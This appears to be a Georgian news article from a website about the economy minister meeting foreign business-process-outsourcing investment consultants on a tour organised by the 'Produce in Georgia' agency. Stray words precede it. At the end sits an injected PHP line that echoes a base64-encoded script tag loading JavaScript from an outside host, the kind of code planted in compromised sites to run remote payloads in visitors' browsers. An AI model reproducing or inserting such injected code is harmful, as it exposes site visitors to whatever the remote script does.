celsiusi
ავერსი შნაიდერი

ვიცე-პრემიერი, ეკონომიკისა და მდგრადი განვითარების მინისტრი ლევან დავითაშვილი საქართველოში ვიზიტით მყოფ საინვესტიციო კონსულტანტებს, ე.წ. ლოკაციის მენეჯერებს შეხვდა, – ინფორმაციას ეკონომიკისა და მდგრადი განვითარების სამინისტრო ავრცელებს.

უწყების ცნობით, შეხვედრაზე განიხილეს საქართველოში ბიზნესსერვისების დისტანციურად მიწოდების სექტორში არსებული პოზიტიური დინამიკა და ის შესაძლებლობები, რასაც ამ სექტორში მოქმედ უცხოურ კომპანიებს საქართველო სთავაზობს.

„ბიზნესსერვისების დისტანციურად მიწოდების ინდუსტრიის მსოფლიო წამყვანი კომპანიების მენეჯერებისა და საინვესტიციო კონსულტანტების მორიგი გაცნობითი ტური საქართველოში სააგენტოს „აწარმოე საქართველოში“ ორგანიზებით შედგა.

ვიზიტის ფარგლებში საქართველოს ამჯერად BPO (ბიზნეს პროცესების აუთსორსინგი) სექტორის 10-ზე მეტი მაღალი რანგის მენეჯერი ეწვია აშშ-დან, დიდი ბრიტანეთიდან, კანადიდან, მექსიკიდან და სამხრეთ აფრიკიდან.

ტურის მიზანია საქართველოში ბიზნესსერვისების დისტანციურად მიწოდების კუთხით საინვესტიციო პოტენციალის წარმოჩენა. საქართველოში ვიზიტისას საინვესტიციო კონსულტანტებმა შეხვედრები გამართეს კერძო და საჯარო უწყებებთან, გაეცნენ ქვეყნის ბიზნესკლიმატს და BPO სექტორში არსებულ საინვესტიციო შესაძლებლობებს.

საინვესტიციო კონსულტანტების თქმით, საქართველო დინამიკურად განვითარებადი ქვეყანაა და ნებისმიერი ორგანიზაციისთვის, რომელიც ეძებს მრავალენოვან მიმართულებას შთამბეჭდავი ტექნოლოგიური უნარებით, შესანიშნავი ინფრასტრუქტურითა და ბიზნესისადმი მეგობრული მთავრობით, საქართველო უნდა იყოს მათი სიის სათავეში.

სააგენტოს „აწარმოე საქართველოში“ ორგანიზებით გასულ თვეებში გამართულმა საინვესტიციო გაცნობითმა ტურებმა აჩვენა, რომ მსგავსი ინიციატივები ეფექტურია როგორც ქვეყნის პოპულარიზაციისთვის, ასევე ინვესტიციების მოზიდვისა და ახალი სამუშაო ადგილების შექმნისთვის“, – აღნიშნულია სამინისტროს ინფორმაციაში.

321
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");